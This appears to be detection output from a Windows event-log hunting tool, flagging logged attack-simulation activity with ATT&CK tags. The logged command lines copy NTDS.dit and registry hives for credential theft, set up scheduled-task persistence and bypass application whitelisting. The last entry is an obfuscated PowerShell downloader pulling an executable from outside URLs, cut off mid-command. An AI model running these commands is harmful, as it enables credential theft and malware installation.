SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 747F3D96-DA72-5D31-0000-0010044F3F00 1300 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ),1," 1 5 4 1 0 0x8000000000000000 4099 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:54.080 747F3D96-DA72-5D31-0000-0010044F3F00 1300 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4098 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:53.815 747F3D96-DA71-5D31-0000-00101A463F00 6168 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1," 1 5 4 1 0 0x8000000000000000 4097 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:52.816 747F3D96-DA70-5D31-0000-00100E2C3F00 112 C:\Windows\System32\pcalua.exe 10.0.17763.1 (WinBuild.160101.0800) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation pcalua.exe -a C:\Windows\system32\javacpl.cpl C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 747F3D96-DA70-5D31-0000-001007293F00 608 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ),1," 1 5 4 1 0 0x8000000000000000 4096 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:52.784 747F3D96-DA70-5D31-0000-001007293F00 608 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1," 1 5 4 1 0 0x8000000000000000 4095 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:50.232 747F3D96-DA6E-5D31-0000-001081F93E00 1284 C:\Windows\System32\pcalua.exe 10.0.17763.1 (WinBuild.160101.0800) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation pcalua.exe -a Java C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 747F3D96-DA6E-5D31-0000-0010D8F63E00 3316 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1," 1 5 4 1 0 0x8000000000000000 4094 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:50.198 747F3D96-DA6E-5D31-0000-0010D8F63E00 3316 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1," 1 5 4 1 0 0x8000000000000000 4093 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:47.232 747F3D96-DA6B-5D31-0000-00102DD33E00 5348 C:\Windows\System32\pcalua.exe 10.0.17763.1 (WinBuild.160101.0800) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation pcalua.exe -a -c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 747F3D96-DA6B-5D31-0000-0010CCD03E00 5332 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1," 1 5 4 1 0 0x8000000000000000 4092 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:47.195 747F3D96-DA6B-5D31-0000-0010CCD03E00 5332 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4091 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.915 747F3D96-DA6A-5D31-0000-00104BC83E00 888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1," 1 5 4 1 0 0x8000000000000000 4090 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence - Scheduled Task Management 2019-07-19 14:57:46.845 747F3D96-DA6A-5D31-0000-0010C5C43E00 3352 C:\Windows\System32\schtasks.exe 10.0.17763.1 (WinBuild.160101.0800) Task Scheduler Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 747F3D96-DA6A-5D31-0000-001074C23E00 3872 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1," 1 5 4 1 0 0x8000000000000000 4089 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.814 747F3D96-DA6A-5D31-0000-001074C23E00 3872 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1," 1 5 4 1 0 0x8000000000000000 4135 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:50.383 747F3D96-DDB6-5D31-0000-0010273D4C00 3952 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-0020FF090500 0x509ff 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-D4A4-5D31-0000-0010DD6D0000 804 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," 1 5 4 1 0 0x8000000000000000 4135 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:50.383 747F3D96-DDB6-5D31-0000-0010273D4C00 3952 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-0020FF090500 0x509ff 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-D4A4-5D31-0000-0010DD6D0000 804 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," 1 5 4 1 0 0x8000000000000000 4135 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:50.383 747F3D96-DDB6-5D31-0000-0010273D4C00 3952 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-0020FF090500 0x509ff 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-D4A4-5D31-0000-0010DD6D0000 804 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1," 1 5 4 1 0 0x8000000000000000 4133 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.220 747F3D96-DD9F-5D31-0000-001041504B00 6508 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1," 1 5 4 1 0 0x8000000000000000 4132 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.192 747F3D96-DD9F-5D31-0000-00102D4D4B00 976 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1," 1 5 4 1 0 0x8000000000000000 4131 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.156 747F3D96-DD9F-5D31-0000-00101A4A4B00 5772 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4130 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.069 747F3D96-DD9F-5D31-0000-00107B454B00 3344 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 10446 System IEWIN7 WinPwnage %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe user mode service demand start LocalSystem ",IEWIN7,System cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045," 7045 0 4 0 0 0x8080000000000000 10446 System IEWIN7 WinPwnage %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe user mode service demand start LocalSystem ",IEWIN7,System Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 6045 System WIN-77LTAPHIQ1R.example.corp remotesvc calc.exe user mode service auto start LocalSystem ",WIN-77LTAPHIQ1R.example.corp,System System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104," 104 0 4 104 0 0x8000000000000000 27736 System PC01.example.corp user01 EXAMPLE System ",PC01.example.corp,System Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 4482 System WIN-77LTAPHIQ1R.example.corp spoolsv cmd.exe user mode service auto start LocalSystem ",WIN-77LTAPHIQ1R.example.corp,System Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 4480 System WIN-77LTAPHIQ1R.example.corp spoolfool cmd.exe user mode service auto start LocalSystem ",WIN-77LTAPHIQ1R.example.corp,System Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, 